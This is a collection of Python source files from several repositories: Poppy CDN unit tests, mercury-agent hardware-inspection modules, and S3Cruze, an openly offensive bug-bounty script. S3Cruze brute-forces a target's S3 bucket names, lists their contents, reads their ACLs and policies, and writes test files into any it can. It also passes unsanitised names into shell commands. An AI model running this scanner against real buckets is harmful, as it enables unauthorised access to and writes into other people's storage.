controller = services.ServiceController(self.driver)
controller.policy_api_client.get.return_value = mock.Mock(
status_code=200,
text=json.dumps(dict(rules=[]))
)
controller.policy_api_client.put.return_value = mock.Mock(
status_code=200,
text='Put successful'
)
controller.policy_api_client.delete.return_value = mock.Mock(
status_code=200,
text='Delete successful'
)
service_obj = service.load_from_json(service_json)
resp = controller.update(
provider_service_id, service_obj, service_obj)
self.assertIn('id', resp[self.driver.provider_name])
def test_purge_all(self):
provider_service_id = json.dumps([{'policy_name': str(uuid.uuid1()),
'protocol': 'http'}])
controller = services.ServiceController(self.driver)
resp = controller.purge(provider_service_id, None)
self.assertIn('error', resp[self.driver.provider_name])
def test_purge_with_service_id_json_load_error(self):
provider_service_id = None
controller = services.ServiceController(self.driver)
resp = controller.purge(provider_service_id, None)
self.assertIn('error', resp[self.driver.provider_name])
def test_purge_with_ccu_exception(self):
provider_service_id = json.dumps([{'policy_name': str(uuid.uuid1()),
'protocol': 'http'}])
controller = services.ServiceController(self.driver)
controller.ccu_api_client.post.return_value = mock.Mock(
status_code=400,
text="purge request post failed"
)
resp = controller.purge(provider_service_id, '/img/abc.jpeg')
self.assertIn('error', resp[self.driver.provider_name])
def test_purge(self):
provider_service_id = json.dumps([{'policy_name': str(uuid.uuid1()),
'protocol': 'https'}])
controller = services.ServiceController(self.driver)
controller.ccu_api_client.post.return_value = mock.Mock(
status_code=201,
text="purge request post complete"
)
resp = controller.purge(provider_service_id, '/img/abc.jpeg')
self.assertIn('id', resp[self.driver.provider_name])
```
#### File: models/response/test_health.py
```python
import ddt
from poppy.common import util
from poppy.transport.pecan.models.response import health
from tests.unit import base
class TestDNSModel(base.TestCase):
def setUp(self):
super(TestDNSModel, self).setUp()
def test_dns_is_alive(self):
dns_model = health.DNSModel(True)
self.assertEqual('true', dns_model['online'])
def test_dns_is_not_alive(self):
dns_model = health.DNSModel(False)
self.assertEqual('false', dns_model['online'])
class TestStorageModel(base.TestCase):
def setUp(self):
super(TestStorageModel, self).setUp()
def test_storage_is_alive(self):
storage_model = health.StorageModel(True)
self.assertEqual('true', storage_model['online'])
def test_storage_is_not_alive(self):
storage_model = health.StorageModel(False)
self.assertEqual('false', storage_model['online'])
class TestProviderModel(base.TestCase):
def setUp(self):
super(TestProviderModel, self).setUp()
def test_provider_is_alive(self):
provider_model = health.ProviderModel(True)
self.assertEqual('true', provider_model['online'])
def test_provider_is_not_alive(self):
provider_model = health.ProviderModel(False)
self.assertEqual('false', provider_model['online'])
@ddt.ddt
class TestHealthModel(base.TestCase):
def setUp(self):
super(TestHealthModel, self).setUp()
self.mock_controller = util.dict2obj(
{'base_url': 'https://www.poppycdn.io/'})
@ddt.file_data('health_map.json')
def test_health(self, health_map):
health_model = health.HealthModel(self.mock_controller, health_map)
storage_name = health_map['storage']['storage_name']
self.assertEqual('true',
health_model['storage'][storage_name]['online'])
dns_name = health_map['dns']['dns_name']
self.assertEqual('true',
health_model['dns'][dns_name]['online'])
@ddt.file_data('health_map_dns_not_available.json')
def test_health_dns_not_available(self, health_map):
health_model = health.HealthModel(self.mock_controller, health_map)
dns_name = health_map['dns']['dns_name']
self.assertEqual('false',
health_model['dns'][dns_name]['online'])
@ddt.file_data('health_map_storage_not_available.json')
def test_health_storage_not_available(self, health_map):
health_model = health.HealthModel(self.mock_controller, health_map)
storage_name = health_map['storage']['storage_name']
self.assertEqual('false',
health_model['storage'][storage_name]['online'])
@ddt.file_data('health_map_provider_not_available.json')
def test_health_provider_not_available(self, health_map):
health_model = health.HealthModel(self.mock_controller, health_map)
providers = health_map['providers']
for provider in providers:
provider_name = provider['provider_name']
provider_is_alive = provider['is_alive']
provider_model = health_model['providers'][provider_name]
if provider_is_alive:
self.assertEqual('true', provider_model['online'])
else:
self.assertEqual('false', provider_model['online'])
``` |
{
"source": "JR0ch17/S3Cruze",
"score": 3
} |
#### File: JR0ch17/S3Cruze/s3cruze.py
```python
print """\033[033m
____ ____ _____
/ ___|___ / ____ _ __ _ _ /__ /_____
\___ \ |_ \| __|| '__|| | | | / /| ____|
___) ___) | |__ | | | |_| | / /_ | ____|
|____/____/|____||_| \__,_|/____/|_____|
Release v1.3
By @JR0ch17\033[0m
"""
import sys, os, commands, requests
from argparse import ArgumentParser
from random import randrange
randomNumber = randrange(100000, 999999)
uploadFile = "BugBounty-%s.txt" % randomNumber
inputFile = ""
targetBucket = ""
upload = ""
delete = ""
def wordMixing(target, word):
wordList = ["{0}{1}".format(target, word)]
wordList.append("{0}-{1}".format(target, word))
wordList.append("{1}-{0}".format(target, word))
wordList.append("{1}{0}".format(target, word))
return wordList
parser = ArgumentParser()
group = parser.add_mutually_exclusive_group(required=True)
parser.add_argument("-t", "--target", dest="targetBucket", help="Select a target bucket name (e.g. 'shopify')", metavar="targetBucket", required="True")
parser.add_argument("-f", "--file", dest="inputFile", help="Select a bucket brute-forcing file (default: bucket-names.txt)", default="bucket-names.txt", metavar="inputFile")
parser.add_argument("-u", "--upload", dest="upload", help="File to upload will be automatically generated (e.g. 'BugBounty-[######].txt')", default=False, action="store_true")
parser.add_argument("-d", "--delete", dest="delete", help="Delete file from bucket after uploading it", default=False, action="store_true")
parser.add_argument("-a", "--acl", dest="acl", help="View bucket ACL", default=False, action="store_true")
parser.add_argument("-p", "--policy", dest="policy", help="View bucket policy", default=False, action="store_true")
parser.add_argument("-c", "--cors", dest="cors", help="View bucket CORS configuration", default=False, action="store_true")
parser.add_argument("-r", "--replication", dest="replication", help="View bucket replication configuration", default=False, action="store_true")
parser.add_argument("-w", "--website", dest="website", help="View bucket website configuration", default=False, action="store_true")
parser.add_argument("-l", "--location", dest="location", help="View bucket location", default=False, action="store_true")
parser.add_argument("--all", dest="all", help="View all bucket configuration", default=False, action="store_true")
group.add_argument("-b", "--bruteforce", dest="bruteforce", help="Bruteforce buckets names. By default it will try to list files from the buckets.", default=False, action="store_true")
group.add_argument("-s", "--single", dest="single", help="Check a single bucket only", default=False, action="store_true")
args = parser.parse_args()
with open(args.inputFile, 'r') as f:
bucketName = [line.strip() for line in f]
lineCount = len(bucketName)
if args.bruteforce:
print "\n [+] Building word list... please be patient :)"
for name in bucketName:
wordList = wordMixing(args.targetBucket, name)
for word in wordList:
r = requests.head("http://%s.s3.amazonaws.com" % (word))
if r.status_code != 404 and r.status_code != 503:
print "\n [+] Checking potential match: %s --> %s." % (word, r.status_code)
ls = commands.getoutput("/usr/bin/aws s3 ls s3://%s" % (word))
print "%s" % (ls)
if args.all:
print "[+] Checking %s bucket configuration." % (word)
acl = commands.getoutput("/usr/bin/aws s3api get-bucket-acl --bucket %s" % (word))
policy = commands.getoutput("/usr/bin/aws s3api get-bucket-policy --bucket %s" % (word))
cors = commands.getoutput("/usr/bin/aws s3api get-bucket-cors --bucket %s" % (word))
replication = commands.getoutput("/usr/bin/aws s3api get-bucket-replication --bucket %s" % (word))
website = commands.getoutput("/usr/bin/aws s3api get-bucket-website --bucket %s" % (word))
location = commands.getoutput("/usr/bin/aws s3api get-bucket-location --bucket %s" % (word))
print "%s %s %s %s %s %s"% (acl, policy, cors, replication, website, location)
else:
sys.stdout.write('')
if args.acl:
print "[+] Checking %s bucket ACL." % (word)
acl = commands.getoutput("/usr/bin/aws s3api get-bucket-acl --bucket %s" % (word))
print "%s \n" % (acl)
else:
sys.stdout.write('')
if args.policy:
print "[+] Checking %s bucket policy." % (word)
policy = commands.getoutput("/usr/bin/aws s3api get-bucket-policy --bucket %s" % (word))
print "%s \n" % (acl)
else:
sys.stdout.write('')
if args.cors:
print "[+] Checking %s bucket CORS configuration." % (word)
cors = commands.getoutput("/usr/bin/aws s3api get-bucket-cors --bucket %s" % (word))
print "%s \n" % (acl)
else:
sys.stdout.write('')
if args.replication:
print "[+] Checking %s bucket replication configuration." % (word)
replication = commands.getoutput("/usr/bin/aws s3api get-bucket-replication --bucket %s" % (word))
print "%s \n" % (replication)
else:
sys.stdout.write('')
if args.website:
print "[+] Checking %s bucket website configuration." % (word)
website = commands.getoutput("/usr/bin/aws s3api get-bucket-website --bucket %s" % (word))
print "%s \n" % (website)
else:
sys.stdout.write('')
if args.location:
print "[+] Checking %s bucket location." % (word)
location = commands.getoutput("/usr/bin/aws s3api get-bucket-location --bucket %s" % (word))
print "%s \n" % (location)
else:
sys.stdout.write('')
if args.upload:
file = open(uploadFile, 'w+')
file.write("This is a file upload test for bug bounty purposes")
file.close()
print "[+] Uploading file: %s." % (uploadFile)
cp = commands.getoutput("/usr/bin/aws s3 cp %s s3://%s" % (uploadFile, word))
print "%s \n" % (cp)
if args.delete:
print "[+] Delete file: %s." % (uploadFile)
rm = commands.getoutput("/usr/bin/aws s3 rm s3://%s/%s" % (word, uploadFile))
print "%s \n" % (rm)
os.remove("%s" % (uploadFile))
else:
sys.stdout.write('')
else:
sys.stdout.write('')
else:
sys.stdout.write('')
if args.single:
print "\n [+] Listing files for %s." % (args.targetBucket)
ls = commands.getoutput("/usr/bin/aws s3 ls s3://%s" % (args.targetBucket))
print ls
if args.all:
print "[+] Checking %s bucket configuration." % (args.targetBucket)
acl = commands.getoutput("/usr/bin/aws s3api get-bucket-acl --bucket %s" % (args.targetBucket))
policy = commands.getoutput("/usr/bin/aws s3api get-bucket-policy --bucket %s" % (args.targetBucket))
cors = commands.getoutput("/usr/bin/aws s3api get-bucket-cors --bucket %s" % (args.targetBucket))
replication = commands.getoutput("/usr/bin/aws s3api get-bucket-replication --bucket %s" % (args.targetBucket))
website = commands.getoutput("/usr/bin/aws s3api get-bucket-website --bucket %s" % (args.targetBucket))
location = commands.getoutput("/usr/bin/aws s3api get-bucket-location --bucket %s" % (args.targetBucket))
print "%s %s %s %s %s %s" % (acl, policy, cors, replication, website, location)
else:
sys.stdout.write('')
if args.acl:
print "[+] Checking %s bucket ACL." % (args.targetBucket)
acl = commands.getoutput("/usr/bin/aws s3api get-bucket-acl --bucket %s" % (args.targetBucket))
print "%s" % (acl)
else:
sys.stdout.write('')
if args.policy:
print "[+] Checking %s bucket policy." % (args.targetBucket)
policy = commands.getoutput("/usr/bin/aws s3api get-bucket-policy --bucket %s" % (args.targetBucket))
print "%s" % (policy)
else:
sys.stdout.write('')
if args.cors:
print "[+] Checking %s bucket CORS configuration." % (args.targetBucket)
cors = commands.getoutput("/usr/bin/aws s3api get-bucket-cors --bucket %s" % (args.targetBucket))
print "%s" % (cors)
else:
sys.stdout.write('')
if args.replication:
print "[+] Checking %s bucket replication configuration." % (args.targetBucket)
replication = commands.getoutput("/usr/bin/aws s3api get-bucket-replication --bucket %s" % (args.targetBucket))
print "%s" % (replication)
else:
sys.stdout.write('')
if args.website:
print "[+] Checking %s bucket website configuration." % (args.targetBucket)
website = commands.getoutput("/usr/bin/aws s3api get-bucket-website --bucket %s" % (args.targetBucket))
print "%s" % (website)
else:
sys.stdout.write('')
if args.location:
print "[+] Checking %s bucket website configuration." % (args.targetBucket)
location = commands.getoutput("/usr/bin/aws s3api get-bucket-location --bucket %s" % (args.targetBucket))
print "%s" % (location)
else:
sys.stdout.write('')
if args.upload:
file = open(uploadFile, 'w+')
file.write("This is a file upload test for bug bounty purposes")
file.close()
print "[+] Uploading file: %s." % (uploadFile)
cp = commands.getoutput("/usr/bin/aws s3 cp %s s3://%s" % (uploadFile, args.targetBucket))
print "%s \n" % (cp)
if args.delete:
print "[+] Delete file: %s." % (uploadFile)
rm = commands.getoutput("/usr/bin/aws s3 rm s3://%s/%s" % (args.targetBucket, uploadFile))
print "%s \n" % (rm)
os.remove("%s" % (uploadFile))
else:
sys.stdout.write('')
else:
sys.stdout.write('')
else:
sys.stdout.write('')
print "\n \033[033m[*] S3Cruze is now complete on %s.\033[0m" % (args.targetBucket)
``` |
{
"source": "jr0d/mercury-agent",
"score": 2
} |
#### File: mercury-agent/mercury_agent/backend_client.py
```python
from mercury_agent.configuration import get_configuration
from mercury.common.clients.rpc.backend import BackEndClient
# Private
__backend_client = None
def get_backend_client():
# TODO: Trying this out, 0mq says it is ok
global __backend_client
if not __backend_client:
__backend_client = BackEndClient(
get_configuration().agent.remote.backend_url)
return __backend_client
```
#### File: mercury-agent/mercury_agent/capabilities.py
```python
import logging
LOG = logging.getLogger(__name__)
runtime_capabilities = {}
def add_capability(entry, name, description, doc=None, serial=False,
num_args=None, kwarg_names=None, no_return=False,
dependency_callback=None, timeout=1800,
task_id_kwargs=False):
"""Add a new capability to the runtime capabilities.
:param entry: The new capability.
:param name: Name of the new capability.
:param description: Description of the new capability.
:param doc: Function docstring.
:param serial: Boolean indication if the task is serial.
:param num_args: Number of expected arguments.
:param kwarg_names: Named arguments.
:param no_return: True if the task doesn't return any value.
:param dependency_callback: Callback to check dependency.
:param timeout: Timeout for the new capability.
:param task_id_kwargs: Whether to put task_id in kwargs.
"""
LOG.info('Adding capability %s' % name)
runtime_capabilities[name] = {
'name': name,
'entry': entry,
'description': description,
'doc': doc,
'serial': serial,
'num_args': num_args,
'kwarg_names': kwarg_names,
'no_return': no_return,
'dependency_callback': dependency_callback,
'timeout': timeout,
'task_id_kwargs': task_id_kwargs
}
def capability(name, description, serial=False, num_args=None,
kwarg_names=None, no_return=False,
dependency_callback=None, timeout=1800, task_id_kwargs=False):
"""Decorator to add a new capability.
:param name: Name of the new capability.
:param description: Description of the new capability.
:param serial: Boolean indication if the task is serial.
:param num_args: Number of expected arguments.
:param kwarg_names: Named arguments.
:param no_return: True if the task doesn't return any value.
:param dependency_callback: Callback to check dependency.
:param timeout: Timeout for the new capability.
:param task_id_kwargs: Whether to put task_id in kwargs.
"""
def wrap(entry):
add_capability(entry, name, description, doc=entry.__doc__,
serial=serial, num_args=num_args,
kwarg_names=kwarg_names, no_return=no_return,
dependency_callback=dependency_callback,
timeout=timeout, task_id_kwargs=task_id_kwargs)
return entry
return wrap
```
#### File: hardware/general/mcelog.py
```python
from mercury.common.exceptions import MercuryGeneralException
from mercury.common.helpers import cli
HWEVENT_SEARCH_TERM = 'Hardware event. This is not a software error.'
JOURNALCTL_COMMAND = 'journalctl -a --output cat --unit=mcelog.service ' \
'--no-pager'
def get_mcelog_journal_stream():
p = cli.run(JOURNALCTL_COMMAND, raw=True)
if p.returncode:
raise MercuryGeneralException('Error getting mcelog')
return p.stdout
def query_mcelog_daemon(mcelog_path='mcelog'):
"""
Used to expose memory error counts
:param mcelog_path:
:return:
"""
mcelog = cli.find_in_path(mcelog_path)
if not mcelog:
raise MercuryGeneralException('Could not find mcelog')
result = cli.run(f'{mcelog} --client', raise_exception=False)
return result.stdout
def count_logged_events():
"""
Searches data stream and returns a count of HWEVENT_SEARCH_TERM
:param data:
:return:
"""
count = 0
for line in get_mcelog_journal_stream().readlines():
if HWEVENT_SEARCH_TERM in line.decode('utf-8'):
count += 1
return count
if __name__ == '__main__':
print(count_logged_events())
```
#### File: oem/dell/om_xml_deserializer.py
```python
from io import BytesIO
from lxml import etree
class XMLError(Exception):
pass
class XLoader(object):
def __init__(self, xml_data):
self.xml_data = xml_data
@property
def root(self):
return etree.parse(BytesIO(self.xml_data)).getroot()
class XMLAbout(dict):
def __init__(self, oma):
super(XMLAbout, self).__init__()
about = oma.find('About')
if about is None:
raise XMLError('About element is missing.')
self['components'] = list()
for child in about:
if child.tag == 'Component':
self._add_component(child)
else:
self[child.tag] = child.text.strip()
def _add_component(self, component):
d = dict()
for child in component:
d[child.tag] = child.text.strip()
self['components'].append(d)
class XMLChassisStatus(dict):
status_translation = {
1: "Unknown",
2: "Ok",
3: "Non-critical",
4: "Critical"
}
# triple (tag, object list tag, description)
element_list = [
('intrusion', 'IntrusionObj', 'IntrusionLoc'),
('voltages', 'VoltageObj', 'ProbeLocation'),
('temperatures', 'TemperatureObj', 'ProbeLocation'),
('fans', 'Redundancy', 'Fan System'),
('currents', 'CurrentObj', 'ProbeLocation'),
('powersupply', 'PowerSupplyObj', 'PSLocation'),
('powermonitoring', 'PowerConsumptionDataObj', 'Identifier'),
('processor', 'DevProcessorObj', 'Brand'),
('esmlog', 'LogObj', 'HardwareLog'),
('memory', 'MemDevObj', 'Memory'),
('batteries', 'BatteryObj', 'ProbeLocation'),
('sdcard', 'SDCard', 'SDCardLocation')
]
computed_status_tag = 'computedobjstatus'
objstatus_tag = 'objstatus'
def __init__(self, root):
super(XMLChassisStatus, self).__init__()
parent = root[0]
for tag, obj, obj_desc in self.element_list:
element = parent.find(tag)
if element is None:
continue
self[tag] = dict()
status_element = element.find(self.computed_status_tag)
self[tag]['status'] = int(status_element.text.strip())
self[tag]['status_string'] = status_element.attrib.get('strval')
self[tag]['sensors'] = list()
sensor_elements = element.findall(obj)
for sensor_element in sensor_elements:
sensor_dict = dict()
description_element = sensor_element.find(obj_desc)
if description_element is not None:
sensor_dict['description'] = description_element.text
else:
sensor_dict['description'] = obj_desc
sensor_dict['status'] = sensor_element.find(self.objstatus_tag).text
self[tag]['sensors'].append(sensor_dict)
@property
def errors(self):
err = list()
for tag in self:
if self[tag]['status'] == 2:
continue
error_dict = self[tag]
error_dict['component'] = tag
err.append(error_dict)
return err
class XMLVDisk(dict):
vdisk_obj_tag = 'DCStorageObject'
def __init__(self, oma):
super(XMLVDisk, self).__init__()
vdisk_element = oma.find('VirtualDisks')
if vdisk_element is None:
return
obj_elements = vdisk_element.findall(self.vdisk_obj_tag)
for obj in obj_elements:
device_id = int(obj.find('DeviceID').text)
self[device_id] = dict()
self[device_id]['status'] = int(obj.find('ObjStatus').text)
self[device_id]['state'] = int(obj.find('ObjState').text)
self[device_id]['read_policy'] = int(obj.find('DefaultReadPolicy').text)
self[device_id]['write_policy'] = int(obj.find('DefaultWritePolicy').text)
self[device_id]['name'] = obj.find('Name').text
class XMLController(dict):
controller_obj_tag = 'DCStorageObject'
def __init__(self, oma):
super(XMLController, self).__init__()
controller_element = oma.find('Controllers')
if controller_element is None:
return
# TODO: See what multiple controllers looks like
obj_element = controller_element.find(self.controller_obj_tag)
self['name'] = obj_element.find('Name').text
self['status'] = int(obj_element.find('ObjStatus').text)
self['state'] = int(obj_element.find('ObjState').text)
class XMLPDisk(dict):
pdisk_obj_tag = 'DCStorageObject'
def __init__(self, oma):
super(XMLPDisk, self).__init__()
pdisk_element = oma.find('ArrayDisks')
obj_elements = pdisk_element.findall(self.pdisk_obj_tag)
for obj in obj_elements:
device_id = int(obj.find('DeviceID').text)
self[device_id] = dict()
self[device_id]['status'] = int(obj.find('ObjStatus').text)
self[device_id]['state'] = int(obj.find('ObjState').text)
self[device_id]['vendor'] = obj.find('Vendor').text
```
#### File: oem/hp/hpasmcli.py
```python
import re
from mercury.common.helpers import cli
invalid_charcaters = '.$ /\\\\'
class HPAsmException(Exception):
pass
class HPASMCLI:
def __init__(self, hpasmcli_path='hpasmcli'):
"""
A class interface for the hpasmcli utility
:param hpasmcli_path:
"""
self.hpasmcli = cli.find_in_path(hpasmcli_path)
if not self.hpasmcli:
raise HPAsmException('Could not find hpasmcli binary')
@staticmethod
def fix_key_names(data):
rgx = re.compile('[{}]'.format(invalid_charcaters))
return rgx.sub('_', data.strip(invalid_charcaters).lower())
@staticmethod
def convert_digit(data):
return int(data) if data.isdigit() else data
def hpasm_run(self, command):
result = cli.run('{} -s \'{}\''.format(self.hpasmcli, command))
if result.returncode:
raise HPAsmException('Error running command: {}'.format(command))
return result
def show_server(self):
"""
Data is probably formatted like so:
System : ProLiant DL380 Gen9
Serial No. : TC51NR9952
ROM version : v2.60 (05/21/2018) P89
UEFI Support : Yes
iLo present : Yes
Embedded NICs : 8
NIC1 MAC: 38:63:bb:3f:4b:f4
NIC2 MAC: 38:63:bb:3f:4b:f5
NIC3 MAC: 38:63:bb:3f:4b:f6
NIC4 MAC: 38:63:bb:3f:4b:f7
NIC5 MAC: 8c:dc:d4:ad:d6:d0
NIC6 MAC: 8c:dc:d4:ad:d6:d1
NIC7 MAC: 68:05:ca:39:89:a0
NIC8 MAC: 68:05:ca:39:89:a1
Processor: 0
Name : Intel(R) Xeon(R) CPU E5-2630 v3 @ 2.40GHz
Stepping : 2
Speed : 2400 MHz
Bus : 100 MHz
Core : 8
Thread : 16
Socket : 1
Level1 Cache : 512 KBytes
Level2 Cache : 2048 KBytes
Level3 Cache : 20480 KBytes
Status : Ok
Processor: 1
Name : Intel(R) Xeon(R) CPU E5-2630 v3 @ 2.40GHz
Stepping : 2
Speed : 2400 MHz
Bus : 100 MHz
Core : 8
Thread : 16
Socket : 2
Level1 Cache : 512 KBytes
Level2 Cache : 2048 KBytes
Level3 Cache : 20480 KBytes
Status : Ok
Processor total : 2
Memory installed : 131072 MBytes
ECC supported : Yes
"""
data = self.hpasm_run('SHOW SERVER')
details = {}
embedded_nics_context = False
processor_context = False
processor_index = -1
for line in [_ for _ in data.splitlines() if _]:
label, value = (_.strip() for _ in line.split(':', 1))
label = self.fix_key_names(label)
value = self.convert_digit(value)
if embedded_nics_context or processor_context:
if line[0] != '\t':
embedded_nics_context = processor_context = False
if label == 'embedded_nics':
details[label] = {'count': int(value), 'nics': []}
embedded_nics_context = True
elif label == 'processor':
processor_context = True
processor_index = value
if processor_index == 0:
details['processors'] = [{}]
else:
details['processors'].append({})
elif embedded_nics_context:
details['embedded_nics']['nics'].append({label: value})
elif processor_context:
details['processors'][processor_index][label] = value
else:
details[label] = value
return details
def show_dimm(self):
"""
Example output:
DIMM Configuration
------------------
Processor #: 1
Module #: 1
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
Processor #: 1
Module #: 4
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
Processor #: 1
Module #: 9
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
Processor #: 1
Module #: 12
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
Processor #: 2
Module #: 1
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
Processor #: 2
Module #: 4
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
Processor #: 2
Module #: 9
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
Processor #: 2
Module #: 12
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
"""
data = self.hpasm_run('SHOW DIMM')
# Knocks off the first three lines then splits on double \n
segments = '\n'.join(data.splitlines()[3:]).split("\n\n")
details = []
for segment in segments:
if segment:
dimm_info = {}
details.append(dimm_info)
for line in segment.splitlines():
key, value = (_.strip() for _ in line.split(':', 1))
dimm_info[self.fix_key_names(key)] = self.convert_digit(value)
return details
def show_powersupply(self):
data = self.hpasm_run('SHOW POWERSUPPLY')
power_supplies = []
ps_data = {}
for line in [_ for _ in data.splitlines() if _]:
if 'Power supply' in line:
if ps_data:
power_supplies.append(ps_data)
ps_data = {}
continue
key, value = (_.strip() for _ in line.split(':', 1))
ps_data[self.fix_key_names(key)] = value
power_supplies.append(ps_data)
return power_supplies
def clear_iml(self):
return self.hpasm_run('CLEAR IML')
```
#### File: inspector/hwlib/cpuinfo.py
```python
import os
def build_index(l, key):
our_dict = dict()
for d in l:
if key not in d:
continue
idx = d[key]
if idx in our_dict:
our_dict[idx].append(d)
else:
our_dict[idx] = [d]
return our_dict
def get_cpufreq_info(cpu):
sys_cpu_path = '/sys/devices/system/cpu/cpu%s/cpufreq' % str(cpu)
if not os.path.exists(sys_cpu_path):
return dict()
def read(path):
with open(path) as fp:
return int(fp.read().strip())
freq = dict()
freq['min'] = read(os.path.join(sys_cpu_path, 'scaling_min_freq'))
freq['max'] = read(os.path.join(sys_cpu_path, 'scaling_max_freq'))
freq['cur'] = read(os.path.join(sys_cpu_path, 'scaling_cur_freq'))
return freq
class CPUInfo(object):
def __init__(self):
if not os.path.exists('/proc/cpuinfo'):
raise OSError('/proc/cpuinfo is missing. Bro, do you even linux?')
with open('/proc/cpuinfo') as fp:
self.raw_cpuinfo = fp.read()
cores = self.raw_cpuinfo.split('\n\n')
self.core_dicts = list()
for core in cores:
if not core:
continue
core_dict = dict()
for attribute in core.splitlines():
if not attribute:
continue
k, v = attribute.split(':')
fixed_key = k.strip().replace(' ', '_').lower()
stripped_value = v.strip()
if fixed_key in ['processor', 'physical_id', 'core_id', 'cpu_cores']:
stripped_value = int(stripped_value)
core_dict[fixed_key] = stripped_value
self.core_dicts.append(core_dict)
self.core_dicts.sort(key=lambda d: d['processor'])
@property
def physical_index(self):
return build_index(self.core_dicts, 'physical_id')
@property
def logical_processor_index(self):
return build_index(self.core_dicts, 'processor')
@property
def processor_ids(self):
return [core_dict['processor'] for core_dict in self.core_dicts]
@property
def physical_processor_count(self):
return len(self.physical_index)
@property
def logical_core_count(self):
# AKA, threads (HTT)
return len(self.core_dicts)
@property
def total_physical_core_count(self):
# We assume that multi socket systems will be using the same proc
return self.cores_per_processor * self.physical_processor_count
def get_cores(self, physical_id):
return self.physical_index.get(physical_id)
@property
def cores_per_processor(self):
return self.one_core.get('cpu_cores')
@property
def core_zero_index(self):
physical_index = self.physical_index
for physical_id in physical_index:
physical_index[physical_id] = physical_index[physical_id][0]
return physical_index
@staticmethod
def get_speed_info(core_dict):
speed_info = dict()
processor_id = int(core_dict['processor'])
speed_info['model_name'] = core_dict['model_name']
cpufreq = get_cpufreq_info(processor_id)
cpufreq_enabled = bool(cpufreq) or False
speed_info['bogomips'] = float(core_dict['bogomips'])
speed_info['cpufreq_enabled'] = cpufreq_enabled
if cpufreq_enabled:
speed_info['current'] = float(cpufreq['cur'])
speed_info['min'] = float(cpufreq['min'])
speed_info['max'] = float(cpufreq['max'])
else:
cpu_speed = core_dict['cpu_mhz']
speed_info['current'] = float(cpu_speed)
speed_info['min'] = float(cpu_speed)
speed_info['max'] = float(cpu_speed)
return speed_info
def get_physical_speed_info(self):
speed_info = list()
zero_index = self.core_zero_index
for physical_processor in zero_index:
core_dict = zero_index[physical_processor]
speed_info.append(self.get_speed_info(core_dict))
return speed_info
@property
def one_core(self):
return self.core_dicts and self.core_dicts[0] or dict()
```
#### File: inspector/hwlib/lspci.py
```python
import shlex
import six
import subprocess
# Class codes used by lspci.
ETHERNET_CONTROLLER = '0200'
NETWORK_CONTROLLER = '0280'
FIBRE_CHANNEL = '0c04'
RAID_CONTROLLER = '0104'
# TODO: Move to mercury.common.exceptions
class LSPCIError(Exception):
"""Raised when something goes wrong related to the `lspci` command."""
pass
def lspci_run(arguments='-mm'):
"""Runs lspci and returns the output.
:param arguments: Arguments you want to pass to lspci default = '-mm'
:return: stdout from lspci command
:except: LSPCIException on non-zero return code
"""
cmd = shlex.split('lspci ' + arguments)
sub_proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = sub_proc.communicate()
if sub_proc.returncode:
raise LSPCIError('[%d] %s' % (sub_proc.returncode, err))
if isinstance(out, six.binary_type):
# noinspection PyUnresolvedReferences
out = out.decode('utf-8')
return out
def _get_lspci_id(line):
"""Read a hex ID of the form [nnnn] from an `lspci` line.
Gets an id from a line that looks like this:
Intel Corporation [8086]
where 8086 is the id
It should also work if something like this happens:
2nd Generation Core Processor Family DRAM [not_and_id] Controller [0104]
:param line: A string representing a line of lspci output.
:return: A string representing the ID.
"""
hush = line.split('[')
return hush[-1].strip(']')
def _get_lspci_name(line):
"""Reads and returns a 'name' from a line of `lspci` output."""
hush = line.split('[')
return '['.join(hush[0:-1]).strip()
def parse_nnvmmk():
"""
Runs lspci -nnvmmk and parses the output into a list of dictionaries.
:return: a list of dicts with the following keys
slot
vendor_name
device_name
svendor_name
sdevice_name
vendor_id
device_id
svendor_id
sdevice_id
revision
progif
driver
:except:
"""
out = lspci_run('-nnvmmk')
pcibus = list()
blocks = out.split('\n\n')
for block in blocks:
device = dict()
for element in block.splitlines():
split_element = element.split(':')
key = split_element[0]
data = ':'.join(split_element[1:]).strip()
if key in ('Slot', 'ProgIf', 'Driver'):
device[key.lower()] = data
continue
if key in ('Class', 'Vendor', 'Device', 'SVendor', 'SDevice'):
key_prefix = key.lower()
device[key_prefix + '_name'] = _get_lspci_name(data)
device[key_prefix + '_id'] = _get_lspci_id(data)
continue
if key == 'Rev':
device['revision'] = data
continue
if not device:
continue
pcibus.append(device)
return pcibus
class PCIDevice(dict):
"""Represents information about a PCI Device as returned by `lspci`."""
def __init__(self,
slot=None,
class_id=None,
vendor_id=None,
device_id=None,
class_name='',
vendor_name='',
device_name='',
svendor_name=None,
svendor_id=None,
sdevice_name=None,
sdevice_id=None,
revision=None,
progif=None,
driver=None):
"""Create a PCIDevice. Checks for a few required fields."""
if None in [slot, class_id, vendor_id, device_id]:
raise LSPCIError(
'slot, class_id, vendor_id, and device_id are required.')
super(PCIDevice, self).__init__()
self.slot = slot
self.class_id = class_id
self.vendor_id = vendor_id
self.device_id = device_id
self.class_name = class_name
self.vendor_name = vendor_name
self.device_name = device_name
self.svendor_name = svendor_name
self.svendor_id = svendor_id
self.sdevice_name = sdevice_name
self.sdevice_id = sdevice_id
self.revision = revision
self.progif = progif
self.driver = driver
def __getattr__(self, key):
try:
return self[key]
except (KeyError, AttributeError):
return None
